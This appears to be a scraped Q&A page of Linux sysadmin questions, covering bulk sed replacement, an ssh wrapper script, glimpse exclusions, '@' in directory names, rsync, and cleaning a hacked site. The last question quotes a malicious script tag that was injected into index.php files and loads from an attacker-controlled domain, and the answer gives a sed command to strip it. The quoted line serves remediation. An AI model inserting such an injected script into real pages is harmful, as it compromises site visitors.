Linux tool to bulk change a website from http:// to https:// - linux

I need to change an entire PHP-based website from http:// to https://. The SSL certificate has already been installed and shows validity.
Now, the website has many many subdirectories, shops, newsletters etc., but stems from one major directory.
Is there either a tool or a methodology I can do this under Linux recursively, i. e. incorporating all various sub-directories in my search and automatically exchange http:// to https://? Is there a way not only to do the exchange but also to save the changed files automatically?
Maybe a stupid question, but I'd appreciate your help a lot so as to prevent myself from going through every single PHP file in every single directory.

The sed command has an in-place option which can be helpful in executing your change. For example
sed -i 's/original/new/g' file.txt
In your case this may work
sed -i 's/http:\/\//https:\/\//g' ./*.php
I would recommend a backup before you try this since the sed command -i option may work differently on your system.
Here is a reference with more information.

Related

ssh logon with variables

For work, I often have to log on to several different servers which are generally structured in the following:
ssh [username]#[clientName]-[product].[domainName]
The username and domain name are always the same, but the client and the product vary. On my previous computer, I was given a script which allowed me to log on to these servers by typing [product] [clientName], but I lost it when I switched PCs and now I don't know how to do that again.
Though I no doubt have been using the wrong search terms or something, I can't seem to find an answer to this question. All my searches lead me to aliases, which work but only for specific commands, not a general one where I can change the variable. I have over 100 clients and many have multiple different products, so an alias for each is impractical.
Could anyone explain how I implement this?
Bonus: It would also be useful for the command to also take me to a specific sub-directory on the server.
In the script, $0 is the name of the script, and $1 is the first argument. So the script should do:
ssh username#"$1"-"$0".domainName
Create the script once with a generic name, then use symbolic links to that for all the product names.
Put the script and all the links in a directory, and add that directory to your $PATH.

How to exclude directories in glimpse?

I'm using glimpse and I want to exclude searching through some files. I'm using a shared version of glimpse so I can't place a ".glimpse_exclude" file in that directory. I tried putting this file in my own local directory but that didn't work (maybe the answer to my question is more about where I can place this file so that glimpse will find it and use my local version?).
I see that there's a "glimpse -W "a;~b" which can exclude an expression (b, in this case), but I want to exclude a directory, something like:
glimpse -F "~exclude/this/directory/" mysearchwords
The best I have is to pipe this through grep and use grep's exclude functionality:
glimpse mysearchwords | grep -v "exclude/this/directory"
My main issue with this is that it loses glimpse's color coding so is a bit harder to look through the results.
In sum: what's the best way to exclude files for glimpse, without using the .glimpse_exclude file, and/or where can I place that file locally so it will be used when I run searches but will not affect the global glimpse command shared across my network?
In glimpse 3.5, as per http://ftp.icm.edu.pl/packages/glimpse/CHANGES ,
3.0 --> 3.5
- added "-f filename" option to glimpse: it allows you to restrict the
search to only those files whose names appear in "filename".
- fixed the agrep bug where -n was not working with ISO characters.

Could I have any issue using the # (at sign) in a *n*x directory?

I'm developing a website, and want to create a directory after the user username, what is going to be the email address (so I don’t have to generate new ɪᴅs, etc)
I've made some tests and it seems to work fine. Also, I didn’t find any documentation against using the "#" in a directory, but could I find some problem in the future with this approach?
I mean, might some browser not be able to upload images from this directory, or some other problem?
if you plan to run perl scripts (and possibly other languages) against those files you will need to remember to escape the # sign. It's not a huge problem, but I personally would not do it.
More importantly if the path is visible to the browser you would be disclosing the user's email address to the whole world.
I would suggest using something like an MD5 hash of the user's email instead. It is (relatively) unique, and you can recalculate it very easily if you need to. Gravatar uses this approach for instance. See: http://en.gravatar.com/site/implement/hash/
no.. there should be no problems.. browsers are trying to read the file and they don't care that much about the title only file content... (header matters)
So.. there should be no problem...
Historically some remote filesystems have used the # to "escape" from normal path processing to do "interesting" stuff.
Some version control systems use # to denote a certain version of a path (e.g. Subversion, ClearCase).
Some other tools use # to denote "user#remote_host" stuff - AFAIK rsync is one of them which might bite you - you should check if that tool is used somewhere on your site for backup or syncing or something like that.
So - I would not use that character within filenames.

Copying just files not present with SCP

I need to move my web server directory to another server. I'd like to do it with a simple "scp -r destination:destdirectory". But in the meanwhile the directory will be filled with another stuff: so I'll take the old server down the time I need to move the newest file to the new one. How can I do an scp which is gonna write just the differences? So it'll take not much time, and I won't have to take the website down for too long!
Probably not at all, or just with pains. But if you have the possibility to use rsync, just do that. It automatically excludes files that haven't changed, and for changed files, it just transfers the differences.

Linux command line : edit hacked index files [duplicate]

This question already has an answer here:
Hacked Site - SSH to remove a large body of javascript from 200+ files [closed]
(1 answer)
Closed 2 years ago.
I'm unfortunately once more dealing with a hacked site on a Linux Plesk server. While the issue is fixed with FTP access changed (it got down to the famous Filezilla FTP codes hack on a PC) I'd appreciate to know how to edit files as it may take over an hour to restore the site to the most recent backup we have, and I'd be glad to have it back online faster.
The hack is rather simple: a javascript code was inserted in many index* (only index.php it seems) files in the site.
I'm looking for a way to mass-edit the hacked files, knowing that even though the target javascript code is the same, it is called from a number of probably also hacked sites. So while my legitimate index file used to start with
<?php
it now starts like
<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php
As that chain contains a variable, could you help me find a sure-fire method to edit all the changed Index files (about 80 found) ?
I have used a SED replace before but this time part of the chain to replace varies, so could I use a wildcard ?
Best regards, thanks for shedding light !
find -name 'index.php' -print0 |
xargs -0 sed -i '1s#^<script type="text/javascript" src="http://.*\?/facebook.php"></script>##g'
Should do wonders
the sed command:
1 (match in first line)
s#pattern#replacement#g (replace pattern by replacement, not that the latter is empty)
^ must match at start of line
.*\? accept arbitrary length of sequence of characters; however if more than one a match for the whole pattern could be made, only match the shortest possible variant of it
Cheers
I sincerely hope your not actually adminning a production domain. You should inform your users, get the problem fixed, offer the users to go back to a recent backup that hasn't got the problem.
There is no telling what else has been tampered with.
I'm glad my VPS is somewhere else!
I would fix the Cross side scripting exploit before this problem is addressed or it will all be in vain. When thats done a simple search and replace of blocks of script that contain a common string should be sufficient.

Resources